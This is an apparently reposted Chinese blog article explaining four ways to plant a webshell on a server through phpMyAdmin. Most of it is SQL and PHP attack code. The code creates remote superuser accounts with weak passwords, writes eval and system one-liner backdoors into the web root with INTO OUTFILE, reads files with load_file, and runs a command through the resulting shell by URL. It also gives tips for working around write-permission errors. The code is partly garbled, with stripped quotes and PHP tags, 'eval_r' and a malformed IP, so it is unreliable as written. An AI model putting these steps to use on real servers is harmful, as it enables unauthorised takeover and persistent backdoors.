共计 1807 个字符,预计需要花费 5 分钟才能阅读完成。
自动写代码机器人,免费开通
这篇文章将为大家详细讲解有关 PHPmyadmin 拿 shell 的方法有哪些,丸趣 TV 小编觉得挺实用的,因此分享给大家做个参考,希望大家阅读完这篇文章后可以有所收获。
PHPmyadmin 修改用户密码
直接点击上面的 localhost 或者 1270.0.1,出现用户一栏,点击修改即可
添加超级用户 guetsec 密码 ooxx 并且允许外连
GRANT ALL PRIVILEGES ON *.* TO guetsec @ % IDENTIFIED BY ooxx WITH GRANT OPTION;我们可以创建 root 账户设置密码
GRANT ALL PRIVILEGES ON *.* TO root @ % IDENTIFIED BY 123456 WITH GRANT OPTION;这样就创建了 root 外联账户,密码 123456,外链时用 123456
拿 shell 四种经典方法:
方法一:
CREATE TABLE `mysql`.`study` (`7on` TEXT NOT NULL );
INSERT INTO `mysql`.`study` (`7on` )VALUES (?php @eval_r($_POST[7on])?
SELECT 7onFROM study INTO OUTFILE E:/wamp/www/7.php
---- 以上同时执行,在数据库: mysql 下创建一个表名为:study,字段为 7on,导出到 E:/wamp/www/7.php
一句话连接密码:7on方法二:
读取文件内容: select load_file( E:/xamp/www/s.php
写一句话: select ?php @eval_r($_POST[cmd])? INTO OUTFILE E:/xamp/www/study.php
cmd 执行权限: select ?php echo \ pre \ system($_GET[\ cmd\ echo \ /pre \ ? INTO OUTFILE E:/xamp/www/study.php方法三:
JhackJ 版本 PHPmyadmin 拿 shell
Create TABLE study (cmd text NOT NULL);
Insert INTO study (cmd) VALUES(?php eval_r($_POST[cmd])?
select cmd from study into outfile E:/wamp/www/7.php
Drop TABLE IF EXISTS study;
?php eval_r($_POST[cmd])?
--------------------------------------------------------------------------------
?php @eval_r($_POST[cmd])?
CREATE TABLE study(cmd text NOT NULL );# MySQL 返回的查询结果为空 (即零行)。INSERT INTO study( cmd ) VALUES (?php eval_r($_POST[cmd])? # 影响列数: 1
SELECT cmdFROM study INTO OUTFILE E:/wamp/www/7.php # 影响列数: 1
DROP TABLE IF EXISTS study;# MySQL 返回的查询结果为空 (即零行)。方法四:
select load_file( E:/xamp/www/study.php
select ?php echo \ pre \ system($_GET[\ cmd\ echo \ /pre \ ? INTO OUTFILE E:/xamp/www/study.php然后访问网站目录:http://www.2cto.com/study.php?cmd=dir
Phpmyadmin 导出一句话时出现 (Errcode: 13 – Permission denied)
是对此目录没有权限,可以试试上级目录,或者下级目录
再不行试试 NTS 引流
还有就是注意目录 \
关于“PHPmyadmin 拿 shell 的方法有哪些”这篇文章就分享到这里了,希望以上内容可以对大家有一定的帮助,使各位可以学到更多知识,如果觉得文章不错,请把它分享出去让更多的人看到。
向 AI 问一下细节
正文完
